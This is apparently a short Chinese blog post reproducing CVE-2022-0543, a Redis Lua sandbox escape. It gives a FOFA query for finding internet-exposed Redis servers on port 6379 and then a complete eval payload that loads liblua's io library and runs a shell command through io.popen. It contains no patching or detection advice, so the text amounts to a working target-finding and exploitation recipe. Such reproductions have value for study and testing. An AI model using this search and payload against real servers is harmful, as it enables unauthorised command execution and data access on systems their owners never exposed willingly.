Redis Lua沙盒绕过 命令执行(CVE-2022-0543)漏洞复现

Redis Lua沙盒绕过 命令执行(CVE-2022-0543)漏洞复现

Redis如果在没有开启认证的情况下，可以导致任意用户在可以访问目标服务器的情况下未授权访问Redis以及读取Redis的数据。--那么这也就是redis未授权访问了

Redis的默认端口是6379 可以用空间测绘搜索，也可以用nmap等端口扫描工具来扫描

fofa语法搜索：port="6379" && protocol="redis"

‍

用Another Redis Desktop Manager连接上数据库之后，在控制台输入以下命令

eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0

​​​​

‍

‍